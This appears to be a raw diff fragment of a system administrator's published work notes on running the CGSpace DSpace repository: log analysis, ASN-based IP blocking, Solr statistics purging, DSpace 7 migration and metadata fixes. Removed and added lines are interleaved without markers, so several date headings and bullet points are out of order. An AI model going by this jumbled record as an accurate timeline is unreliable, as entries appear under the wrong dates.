</span></span><span style="display:flex;"><span> 1217 157.55.39.161
</span></span><span style="display:flex;"><span> 1252 207.46.13.177
</span></span><span style="display:flex;"><span> 1274 157.55.39.162
</span></span><span style="display:flex;"><span> 2553 66.249.66.221
</span></span><span style="display:flex;"><span> 2941 95.108.213.28
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] &#34;GET /rest/handle/10568/34374?expand=all HTTP/1.0&#34; 200 10671 &#34;-&#34; &#34;-&#34;
</span></span><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] &#34;GET /rest/handle/10568/34795?expand=all HTTP/1.0&#34; 200 11394 &#34;-&#34; &#34;-&#34;
</span></span></code></pre></div><ul>
<li>One IP is using a strange user agent though:</li>
<li>I can only assume that these requests used a literal &lsquo;-&rsquo; so I will have to add an nginx rule to block those too</li>
<li>Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester&hellip; I should ask Macaroni Bros about that</li>
</ul>
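<p>A sketch of such an nginx rule — hypothetical, since the real config already defines its own variables for the existing 403 check — that treats a literal <code>-</code> user agent the same as an empty one (both are logged identically as <code>-</code>):</p>

```nginx
# Illustrative sketch: block empty and literal "-" user agents alike
map $http_user_agent $bad_user_agent {
    default 0;
    ""      1;
    "-"     1;
}

server {
    # ...
    if ($bad_user_agent) {
        return 403 "Due to abuse we no longer permit requests without a descriptive user agent.";
    }
}
```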
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] &#34;GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1&#34; 404 10890 &#34;-&#34; &#34;SomeRandomText&#34;
</span></span></code></pre></div><ul>
<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>17314
</span></span></code></pre></div><ul>
<li>That&rsquo;s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
<h2 id="2022-03-24">2022-03-24</h2>
<ul>
<li>The ISPs I&rsquo;ve seen so far are ChinaNet and China Unicom</li>
<li>Maria from ABC asked about a reporting discrepancy on AReS
<ul>
<li>I think it&rsquo;s because the last harvest was over the weekend, and she was expecting to see items submitted this week</li>
</ul>
</li>
<li>I extracted all the IPs from today and resolved them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2022-04-18-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
</span></span></code></pre></div><ul>
<li>The top ASNs by IP are:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 102 GOOGLE
</span></span><span style="display:flex;"><span> 139 Maxihost LTDA
</span></span><span style="display:flex;"><span> 165 AMAZON-02
</span></span><span style="display:flex;"><span> 393 &#34;China Mobile Communications Group Co., Ltd.&#34;
</span></span><span style="display:flex;"><span> 473 AMAZON-AES
</span></span><span style="display:flex;"><span> 616 China Mobile communications corporation
</span></span><span style="display:flex;"><span> 642 M247 Ltd
</span></span><span style="display:flex;"><span> 2336 HostRoyale Technologies Pvt Ltd
</span></span><span style="display:flex;"><span> 4556 Chinanet
</span></span><span style="display:flex;"><span> 5527 CHINA UNICOM China169 Backbone
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 139 262287
</span></span><span style="display:flex;"><span> 165 16509
</span></span><span style="display:flex;"><span> 180 204287
</span></span><span style="display:flex;"><span> 393 9808
</span></span><span style="display:flex;"><span> 473 14618
</span></span><span style="display:flex;"><span> 615 56041
</span></span><span style="display:flex;"><span> 642 9009
</span></span><span style="display:flex;"><span> 2156 203020
</span></span><span style="display:flex;"><span> 4556 4134
</span></span><span style="display:flex;"><span> 5527 4837
</span></span></code></pre></div><ul>
<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>20296
</span></span></code></pre></div><ul>
<li>I extracted the IPv4 and IPv6 networks:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep -v <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv4-networks.txt
</span></span></code></pre></div><ul>
<li>I suspect we need to aggregate these networks since they are so many and nftables doesn&rsquo;t like it when they overlap:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
</span></span><span style="display:flex;"><span>2781
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
</span></span><span style="display:flex;"><span>338
</span></span></code></pre></div><ul>
<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
<li>Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted
<ul>
<li>This list is SURELY too broad because we will block legitimate users in China&hellip; but right now how can I discern?</li>
<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
<li>She asked if we can download them and upload them directly to CGSpace</li>
</ul>
</li>
<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
</ul>
<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
<li>I re-created my local Artifactory container</li>
<li>I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
<ul>
<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
<li>One thing I realized is that OAI is no longer a standalone web application, it is part of the <code>server</code> app now: http://localhost:8080/server/oai/request?verb=Identify</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort -u &gt; /tmp/ips.log
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv4-networks-aggregated.txt
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv6-networks-aggregated.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt
</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
</span></span></code></pre></div><ul>
<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
<ul>
<li>Deploy PostgreSQL 12 on CGSpace (linode18) but don&rsquo;t switch over yet, because I see some users active
<ul>
<li>I did this on DSpace Test in 2022-02 so I just followed the same procedure</li>
<li>After that I ran all system updates and rebooted the server</li>
</ul>
</li>
<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
<ul>
<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
</ul>
</li>
</ul>
<h2 id="2022-04-24">2022-04-24</h2>
<h2 id="2022-03-25">2022-03-25</h2>
<ul>
<li>Looking at the PostgreSQL database size on CGSpace after the update yesterday:</li>
</ul>
<p><img src="/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt="PostgreSQL database size day"></p>
<ul>
<li>The space saving in indexes of recent PostgreSQL releases is awesome!</li>
<li>Import a DSpace 6.x database dump from production into my local DSpace 7 database
<ul>
<li>I see I still get the same errors <a href="/cgspace-notes/2021-04/">I saw in 2021-04</a> when testing DSpace 7.0 beta 5</li>
<li>I had to delete some old migrations, as well as all Atmire ones first:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);
</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;
</span></span></code></pre></div><ul>
<li>Then I was able to migrate to DSpace 7 with <code>dspace database migrate ignored</code> as the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace upgrade notes say</a>
<ul>
<li>I see that the <a href="https://github.com/DSpace/dspace-angular/issues/1357">flash of unstyled content bug</a> still exists on dspace-angular&hellip; ouch!</li>
</ul>
</li>
<li>Start a harvest on AReS</li>
</ul>
<h2 id="2022-04-25">2022-04-25</h2>
<h2 id="2022-03-26">2022-03-26</h2>
<ul>
<li>Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have</li>
<li>Update dspace-statistics-api to Falcon 3.1.0 and <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3">release v1.4.3</a></li>
</ul>
<h2 id="2022-03-28">2022-03-28</h2>
<ul>
<li>There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can&rsquo;t</li>
<li>I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete</li>
<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
<li>I notice we have over 1,000 items with region <code>Africa South of Sahara</code>
<ul>
<li>I am surprised to see these because we did a mass migration to <code>Sub-Saharan Africa</code> in 2020-10 when we aligned to UN M.49</li>
<li>Oh! It seems I used a capital O in <code>Of</code>!</li>
<li>This is curious, I see we missed <code>East Asia</code> and <code>North America</code>, because those are still in our list, but UN M.49 uses <code>Eastern Asia</code> and <code>Northern America</code>&hellip; I will have to raise that with Peter and Abenet later</li>
<li>For now I will just re-run my fixes:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/regions.csv
</span></span><span style="display:flex;"><span>cg.coverage.region,correct
</span></span><span style="display:flex;"><span>East Africa,Eastern Africa
</span></span><span style="display:flex;"><span>West Africa,Western Africa
</span></span><span style="display:flex;"><span>Southeast Asia,South-eastern Asia
</span></span><span style="display:flex;"><span>South Asia,Southern Asia
</span></span><span style="display:flex;"><span>Africa South of Sahara,Sub-Saharan Africa
</span></span><span style="display:flex;"><span>North Africa,Northern Africa
</span></span><span style="display:flex;"><span>West Asia,Western Asia
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.coverage.region -m <span style="color:#ae81ff">227</span> -t correct
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>Then I started a new harvest on AReS</li>
<li>I added the account to the Alliance Admins account, which should allow him to submit to any Alliance collection
<ul>
<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
</ul>
</li>
<li>Abenet and I noticed 1,735 items in CTA&rsquo;s community that have the title &ldquo;delete&rdquo;
<ul>
<li>We asked Peter and he said we should delete them</li>
<li>I exported the CTA community metadata and used OpenRefine to filter all items with the &ldquo;delete&rdquo; title, then used the &ldquo;expunge&rdquo; bulkedit action to remove them</li>
</ul>
</li>
<li>I realized I forgot to clean up the old Let&rsquo;s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
<ul>
<li>I also removed the pre-Ubuntu 20.04 Let&rsquo;s Encrypt stuff from the Ansible infrastructure playbooks</li>
</ul>
</li>
</ul>
<h2 id="2022-03-29">2022-03-29</h2>
<ul>
<li>Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
<ul>
<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
</ul>
</li>
</ul>
<pre tabindex="0"><code>or(
isNotNull(value.match(&#39;33&#39;)),
isNotNull(value.match(&#39;179&#39;)),
isNotNull(value.match(&#39;452&#39;)),
isNotNull(value.match(&#39;489&#39;)),
isNotNull(value.match(&#39;541&#39;)),
isNotNull(value.match(&#39;568&#39;)),
isNotNull(value.match(&#39;646&#39;)),
isNotNull(value.match(&#39;889&#39;))
)
</code></pre><ul>
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;</span>
</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-29-cgiar-tac.map
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i 10947/50
</span></span></code></pre></div><ul>
<li>After that I did some normalization on the <code>cg.subject.system</code> metadata and extracted a few dozen countries to the country field</li>
<li>Start a harvest on AReS</li>
</ul>
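<p>The GREL facet above boils down to a full-string regex match of each record ID against the list of IDs marked &ldquo;delete&rdquo;. A minimal Python sketch of the same logic (the sample values below are hypothetical, only the ID patterns come from the GREL):</p>

```python
import re

# IDs flagged for deletion, taken from the GREL or(isNotNull(value.match(...))) facet
DELETE_IDS = ['33', '179', '452', '489', '541', '568', '646', '889']

def flag_for_delete(value: str) -> bool:
    """GREL's value.match() anchors the regex to the whole string,
    so isNotNull(value.match('33')) behaves like a full match against '33'."""
    return any(re.fullmatch(pattern, value) for pattern in DELETE_IDS)

# Hypothetical ID column from the exported CSV
rows = ['33', '330', '452', '7', '889']
flagged = [v for v in rows if flag_for_delete(v)]
print(flagged)  # ['33', '452', '889']
```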
<h2 id="2022-03-30">2022-03-30</h2>
<ul>
<li>Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>I started looking into the request regarding the CIAT Library PDFs
<ul>
<li>There are over 4,000 links to PDFs hosted on that server in CGSpace metadata</li>
<li>The links seem to be down though! I emailed Paola to ask</li>
</ul>
</li>
</ul>
<h2 id="2022-03-31">2022-03-31</h2>
<ul>
<li>Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC</li>
<li>I will do the following for CMS and G1GC on DSpace Test:
<ul>
<li>Wait for startup</li>
<li>Reload home page</li>
<li>Log in</li>
<li>Do a search for &ldquo;livestock&rdquo;</li>
<li>Click AGROVOC facet for livestock</li>
<li>dspace index-discovery -b</li>
<li>dspace-statistics-api index</li>
</ul>
</li>
<li>With CMS the Discovery Index took:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 379m19.245s
</span></span><span style="display:flex;"><span>user 267m17.704s
</span></span><span style="display:flex;"><span>sys 4m2.937s
</span></span></code></pre></div><ul>
<li>Leroy from CIAT said that the CIAT Library server has security issues so it was limited to internal traffic
<ul>
<li>I extracted a list of URLs from CGSpace to send him:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ &#39;https?://ciat-library&#39;) to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 4552
</span></span></code></pre></div><ul>
<li>I did some checks and cleanups in OpenRefine because there are some values with &ldquo;#page&rdquo; fragments, etc.
<ul>
<li>Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs</li>
<li>I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books</li>
</ul>
</li>
</ul>
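<p>One way to do the same fragment cleanup and deduplication outside OpenRefine is with <code>urllib.parse.urldefrag</code>, which strips the <code>#page</code> part before comparing URLs (the sample URLs below are made up for illustration):</p>

```python
from urllib.parse import urldefrag

# Hypothetical sample of CIAT Library URLs as exported from metadatavalue
urls = [
    'http://ciat-library.example.org/articulos_ciat/book.pdf',
    'http://ciat-library.example.org/articulos_ciat/book.pdf#page=12',
    'http://ciat-library.example.org/articulos_ciat/book.pdf#page=34',
    'http://ciat-library.example.org/articulos_ciat/other.pdf',
]

# Strip "#page" style fragments, then deduplicate while preserving order
seen = set()
unique_pdfs = []
for url in urls:
    base, _fragment = urldefrag(url)
    if base not in seen:
        seen.add(base)
        unique_pdfs.append(base)

print(len(unique_pdfs))  # 2
```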
<!-- raw HTML omitted -->
@ -344,9 +476,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

docs/2022-04/index.html Normal file

@ -0,0 +1,529 @@
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta property="og:title" content="April, 2022" />
<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-04/" />
<meta property="article:published_time" content="2022-04-01T10:53:39+03:00" />
<meta property="article:modified_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="April, 2022"/>
<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
<meta name="generator" content="Hugo 0.97.3" />
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "April, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-04/",
"wordCount": "1867",
"datePublished": "2022-04-01T10:53:39+03:00",
"dateModified": "2022-04-27T08:44:10+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
},
"keywords": "Notes"
}
</script>
<link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-04/">
<title>April, 2022 | CGSpace Notes</title>
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
</head>
<body>
<div class="blog-masthead">
<div class="container">
<nav class="nav blog-nav">
<a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
</nav>
</div>
</div>
<header class="blog-header">
<div class="container">
<h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
<p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
</div>
</header>
<div class="container">
<div class="row">
<div class="col-sm-8 blog-main">
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
<p class="blog-post-meta">
<time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
<h2 id="2022-04-01">2022-04-01</h2>
<ul>
<li>I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday
<ul>
<li>The Discovery indexing took this long:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 334m33.625s
</span></span><span style="display:flex;"><span>user 227m51.331s
</span></span><span style="display:flex;"><span>sys 3m43.037s
</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
<ul>
<li>Start a full harvest on AReS</li>
<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
<li>Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
<li>Looking at the Solr statistics for 2022-03 on CGSpace
<ul>
<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of them with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that&rsquo;s fishy!</li>
<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I&rsquo;ll purge the IP ones</li>
<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too&hellip;</li>
<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
</ul>
</li>
</ul>
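<p>The actual purging here is done by <code>check-spider-ip-hits.sh</code>, but the core of it is a standard Solr delete-by-query against the statistics core. A minimal sketch of building such a request (the core name and commit parameter are assumptions; no request is actually sent here):</p>

```python
import json

def build_delete_query(ips):
    """Build a Solr delete-by-query JSON payload for a batch of client IPs."""
    query = ' OR '.join(f'ip:{ip}' for ip in ips)
    return json.dumps({'delete': {'query': query}})

payload = build_delete_query(['40.77.167.80', '40.77.167.81'])
print(payload)
# To apply it you would POST this to something like
# http://localhost:8081/solr/statistics/update?commit=true
# with Content-Type: application/json (assumed URL, not done here).
```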
<h2 id="2022-04-10">2022-04-10</h2>
<ul>
<li>Start a full harvest on AReS</li>
</ul>
<h2 id="2022-04-13">2022-04-13</h2>
<ul>
<li>UptimeRobot mailed to say that CGSpace was down
<ul>
<li>I looked and found the load at 44&hellip;</li>
</ul>
</li>
<li>There seem to be a lot of locks from the XMLUI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 3173 dspaceWeb
</span></span></code></pre></div><ul>
<li>Looking at the top IPs in nginx&rsquo;s access log one IP in particular stands out:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 941 66.249.66.222
</span></span><span style="display:flex;"><span> 1224 95.108.213.28
</span></span><span style="display:flex;"><span> 2074 157.90.209.76
